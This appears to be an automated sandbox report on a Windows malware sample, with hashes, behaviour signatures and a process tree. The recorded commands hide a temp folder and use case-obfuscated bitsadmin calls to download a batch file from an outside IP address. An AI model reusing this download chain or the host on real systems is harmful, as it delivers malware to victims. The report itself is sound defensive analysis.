Analysis
- max time kernel: 14s
- max time network: 18s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
- submitted: 06-08-2024 02:12

Static task: static1
Behavioral task: behavioral1
- Sample: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
- Resource: win7-20240704-en
General
- Target: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
- Size: 126KB
- MD5: b2dc0f8a36a7e450b11149a8e15ca964
- SHA1: 27fd3d24a969b5b0528b69f1cbd8b293e74a6809
- SHA256: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15
- SHA512: 135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933
- SSDEEP: 1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4
Malware Config
Signatures
- Download via BitsAdmin (1 TTPs, 2 IoCs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 19 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  | Description | IoC | Process |
  |---|---|---|
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | attrib.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe |
  | Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |

- Suspicious use of WriteProcessMemory (64 IoCs)
  Each of the 16 parent/child pairs below is recorded four times in the report (64 entries in total).

  | Description | PID | Process | Target PID | Target process | Entries |
  |---|---|---|---|---|---|
  | wrote to memory of | 2444 | ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe | 2324 | cmd.exe | 4 |
  | wrote to memory of | 2324 | cmd.exe | 2800 | attrib.exe | 4 |
  | wrote to memory of | 2324 | cmd.exe | 396 | cmd.exe | 4 |
  | wrote to memory of | 396 | cmd.exe | 2896 | bitsadmin.exe | 4 |
  | wrote to memory of | 2324 | cmd.exe | 3064 | bitsadmin.exe | 4 |
  | wrote to memory of | 2324 | cmd.exe | 2616 | bitsadmin.exe | 4 |
  | wrote to memory of | 2324 | cmd.exe | 2724 | cmd.exe | 4 |
  | wrote to memory of | 2724 | cmd.exe | 2684 | bitsadmin.exe | 4 |
  | wrote to memory of | 2324 | cmd.exe | 2632 | bitsadmin.exe | 4 |
  | wrote to memory of | 2324 | cmd.exe | 2912 | bitsadmin.exe | 4 |
  | wrote to memory of | 2324 | cmd.exe | 1036 | cmd.exe | 4 |
  | wrote to memory of | 1036 | cmd.exe | 2780 | bitsadmin.exe | 4 |
  | wrote to memory of | 2324 | cmd.exe | 2644 | bitsadmin.exe | 4 |
  | wrote to memory of | 2324 | cmd.exe | 2788 | bitsadmin.exe | 4 |
  | wrote to memory of | 2324 | cmd.exe | 2892 | cmd.exe | 4 |
  | wrote to memory of | 2892 | cmd.exe | 1968 | bitsadmin.exe | 4 |

- Views/modifies file attributes (1 TTPs, 1 IoCs)
Processes (indented by depth in the process tree)

[1] C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 2444

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t3935.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 2324

    [3] C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
        - System Location Discovery: System Language Discovery
        - Views/modifies file attributes
        PID: 2800

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 396

      [4] C:\Windows\SysWOW64\bitsadmin.exe
          Command line: Bitsadmin
          - System Location Discovery: System Language Discovery
          PID: 2896

    [3] C:\Windows\SysWOW64\bitsadmin.exe
        Command line: bitsadmin
        - System Location Discovery: System Language Discovery
        PID: 3064

    [3] C:\Windows\SysWOW64\bitsadmin.exe
        Command line: bitsadmin /crEaTe pls
        - Download via BitsAdmin
        - System Location Discovery: System Language Discovery
        PID: 2616

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 2724

      [4] C:\Windows\SysWOW64\bitsadmin.exe
          Command line: Bitsadmin
          - System Location Discovery: System Language Discovery
          PID: 2684

    [3] C:\Windows\SysWOW64\bitsadmin.exe
        Command line: bitsadmin
        - System Location Discovery: System Language Discovery
        PID: 2632

    [3] C:\Windows\SysWOW64\bitsadmin.exe
        Command line: bitsadmin /ResUme pls
        - System Location Discovery: System Language Discovery
        PID: 2912

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 1036

      [4] C:\Windows\SysWOW64\bitsadmin.exe
          Command line: Bitsadmin
          - System Location Discovery: System Language Discovery
          PID: 2780

    [3] C:\Windows\SysWOW64\bitsadmin.exe
        Command line: bitsadmin
        - System Location Discovery: System Language Discovery
        PID: 2644

    [3] C:\Windows\SysWOW64\bitsadmin.exe
        Command line: bitsadmin /CompLete pls
        - System Location Discovery: System Language Discovery
        PID: 2788

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 2892

      [4] C:\Windows\SysWOW64\bitsadmin.exe
          Command line: Bitsadmin
          - System Location Discovery: System Language Discovery
          PID: 1968

    [3] C:\Windows\SysWOW64\bitsadmin.exe
        Command line: bitsadmin
        - System Location Discovery: System Language Discovery
        PID: 2564

    [3] C:\Windows\SysWOW64\bitsadmin.exe
        Command line: bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
        - Download via BitsAdmin
        - System Location Discovery: System Language Discovery
        PID: 2692
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
- MD5: 3baa57d1131417b71e8d0bfb45f46ec3
- SHA1: 8443f01dc35d643cf2071c2dd90787d972de64f7
- SHA256: 5911b623c6db07db3193f1ea5f9ba561c04292ec9acabf4586469aa0c77058c8
- SHA512: 0563c9ad298a7f85880afd0f40867a6a67e13bc5a1b5c230f8545b8ba1dc896927b8eb34a54ad7880bd8d43f7108a2ede2710dcfdbf55abd9b22b0b4ef958024